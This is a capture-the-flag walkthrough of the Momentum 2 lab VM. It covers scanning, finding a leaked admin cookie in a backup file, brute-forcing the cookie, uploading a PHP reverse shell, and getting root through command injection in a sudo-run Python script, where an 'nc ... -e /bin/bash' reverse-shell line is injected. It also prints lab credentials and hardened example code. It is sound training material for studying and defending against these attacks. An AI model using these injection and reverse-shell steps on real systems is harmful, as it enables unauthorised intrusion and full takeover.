
Overview:
Target Machine IP Address: 192.168.56.125 My Machine IP Address: 192.168.56.1
Mission:
Boot to Root
- To get user flag
- To get root flag
- To get root access
Level: Easy/Medium
Download:
You can download the machine from here.
Information Gathering & Scanning Process:
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target IP: 192.168.56.125
nmap -sC -sV -p- -Pn 192.168.56.125 -o nmap.log
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
|   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
|   256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-methods:
|   Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum 2 | Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -u 192.168.56.125 -o gobuster.log
$ cat gobuster.log
/img (Status: 301)
/index.html (Status: 200)
/css (Status: 301)
/ajax.php (Status: 200)
/ajax.php.bak (Status: 200)
/manual (Status: 301)
/js (Status: 301)
/dashboard.html (Status: 200)
/owls (Status: 301)
/server-status (Status: 403)

dirsearch -u http://192.168.56.125 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

http://192.168.56.125:80/ajax.php.bak
http://192.168.56.125:80/ajax.php
http://192.168.56.125/css/
http://192.168.56.125/dashboard.html
http://192.168.56.125/img/
http://192.168.56.125/js/
http://192.168.56.125/manual/
I checked all the directories. I am going to explore dashboard.html and js further.

function uploadFile() {
    var files = document.getElementById("file").files;
    if (files.length > 0) {
        var formData = new FormData();
        formData.append("file", files[0]);
        var xhttp = new XMLHttpRequest();
        // Set POST method and ajax file path
        xhttp.open("POST", "ajax.php", true);
        // call on request changes state
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                var response = this.responseText;
                if (response == 1) {
                    alert("Upload successfully.");
                } else {
                    alert("File not uploaded.");
                }
            }
        };
        // Send request with data
        xhttp.send(formData);
    } else {
        alert("Please select a file");
    }
}
http://192.168.56.125/dashboard.html

I thought of uploading a PHP webshell, so let's try.
cp /usr/share/webshells/php/php-reverse-shell.php .
Note: you need to update the IP and port number

I was not able to upload the shell, so I thought I needed to take some time and test with other file formats.
touch test.txt
Upload the file and it goes through without any error, and the uploaded file shows up at http://192.168.56.125/owls (this is a good catch though ;))


$ cat ajax.php.bak
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
    //[+] Add if $_POST['secure'] == 'val1d'
    $valid_ext = array("pdf","php","txt");
} else{
    $valid_ext = array("txt");
}
// Remember success upload returns 1
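To make the weakness in that gate concrete, here is an added Python stand-in for the PHP logic (example code, not the VM's ajax.php): allowed_original mirrors the backup file's behaviour, and allowed_hardened shows the same check as a defender would write it. The cookie constant is the one printed in ajax.php.bak; the hardening choices (no php in any allowlist, constant-time compare, single extension only) are this example's own.

```python
import hmac
import os

# Cookie value as it appears in ajax.php.bak; the comment there says the
# deployed value has one more upper-case letter appended.
ADMIN_COOKIE = '&G6u@B6uDXMq&Ms'


def ext_of(filename):
    """Lower-cased extension after the last dot, '' if there is none."""
    return os.path.splitext(filename)[1].lstrip('.').lower()


def allowed_original(cookie, filename):
    """Mirror of the ajax.php.bak gate: the admin cookie unlocks pdf/php/txt,
    everyone else gets txt only. Plain == comparison, as in the PHP."""
    if cookie is not None and cookie == ADMIN_COOKIE:
        valid_ext = {'pdf', 'php', 'txt'}
    else:
        valid_ext = {'txt'}
    return ext_of(filename) in valid_ext


def allowed_hardened(cookie, filename):
    """Same gate with the defects fixed: no path separators, dotfiles or
    double extensions; constant-time cookie compare; and php is never
    uploadable into a web-served directory, whatever the cookie says."""
    base = os.path.basename(filename)
    if base != filename or base.count('.') != 1 or base.startswith('.'):
        return False
    is_admin = cookie is not None and hmac.compare_digest(
        cookie.encode('utf-8'), ADMIN_COOKIE.encode('utf-8'))
    valid_ext = {'pdf', 'txt'} if is_admin else {'txt'}
    return ext_of(base) in valid_ext
```

Note that the original gate with the right cookie returns True for shell.php, which is exactly the condition the rest of this write-up goes after.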
Based on the above condition, I have written a bash script
#!/usr/bin/bash
for i in {A..Z}; do
    echo '&G6u@B6uDXMq&Ms'$i >> cookie.txt
done

Besides, if we can get the right cookie value for admin, we can also upload the PHP file, which means our file is ready.
My plan is to fire up Burp Suite and brute-force the cookie value with the data set we just prepared (cookie.txt).

POST /ajax.php HTTP/1.1
Host: 192.168.56.125
Content-Length: 5717
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySdAdUP2K6pJ876kK
Accept: */*
Origin: http://192.168.56.125
Connection: close
Referer: http://192.168.56.125/dashboard.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: admin=password

------WebKitFormBoundarySdAdUP2K6pJ876kK
Content-Disposition: form-data; name="secure"

val1d
------WebKitFormBoundarySdAdUP2K6pJ876kK
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php
Then send the request to Repeater and check the response. If it shows 0 or 1, the endpoint is working (per the comment in ajax.php.bak, 1 means the upload succeeded).




By the way, the file gets uploaded at http://192.168.56.125/owls/

Yeah, let's get the reverse shell now.

Boom!! We got user-level access!!
We found two users.



username: athena
password: myvulnerableapp*


I was quite happy to see that Python thing lol, but I was not able to exploit it, so I had to try the cookie-gen.py file. Let's first look at the code and what it is trying to do …

import random
import os
import subprocess

print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed   # assigns the attribute instead of calling random.seed(seed), so the seed never affects the cookie
cookie = ''
for c in range(20):
    cookie += random.choice(chars)
print(cookie)
# the user-supplied seed is interpolated into a shell command string unescaped
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
Although the script only shows the input being echoed back, I was absolutely sure about code execution, so I tried my luck.
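For comparison, here is an added, hardened rewrite of the same generator (example code, not the VM's cookie-gen.py): the seed is written to the log from Python with no shell involved, the generator is seeded properly, and a small metacharacter check shows what a log-monitoring rule for the original script would flag. The SHELL_META set and the helper names are this example's own.

```python
import random

CHARS = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
# Characters that /bin/sh treats specially; any of these in the seed would
# have let the original "echo %s >> log.txt" string run extra commands.
SHELL_META = frozenset(';|&$`<>()\n\r')


def seed_is_safe(seed):
    """Return True only for seeds that carry no shell metacharacters.
    Not needed once the shell is gone, but it is the check a log monitor
    would apply to log.txt entries written by the original script."""
    return not any(ch in SHELL_META for ch in seed)


def make_cookie(seed, length=20):
    """Deterministic cookie from a seed. The original did random.seed = seed
    (assigning an attribute, never seeding), so its output ignored the seed;
    a private Random instance seeded properly fixes that without touching
    the module-global generator."""
    rng = random.Random(seed)
    return ''.join(rng.choice(CHARS) for _ in range(length))


def log_seed(seed, log_path='log.txt'):
    """Append the seed to the log from Python directly: no shell, no string
    interpolation, so the seed is data and can never become a command."""
    with open(log_path, 'a', encoding='utf-8') as fh:
        fh.write(seed + '\n')


if __name__ == '__main__':
    user_seed = input('Enter the seed : ')
    if not seed_is_safe(user_seed):
        raise SystemExit('[!] seed contains shell metacharacters, refusing')
    print(make_cookie(user_seed))
    log_seed(user_seed)
```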

Since the program can run with sudo, I am certain that we can get root. Let's see.
On Kali Linux Machine
nc -lvp 1234
On Victim Machine
sudo python3 /home/team-tasks/cookie-gen.py ;nc 192.168.56.1:1234 -e /bin/bash;


Today, I had a wonderful time because I had a meeting with one colleague over video call for 4 hours and learned a lot about DNS and firewalling. And then I resumed my shelling. By the way, evening prayers were done before the conference because I was afraid it would take more time and at the end I would end up praying sluggishly lol. Anyway, that's all.. Catch you tomorrow with a new box.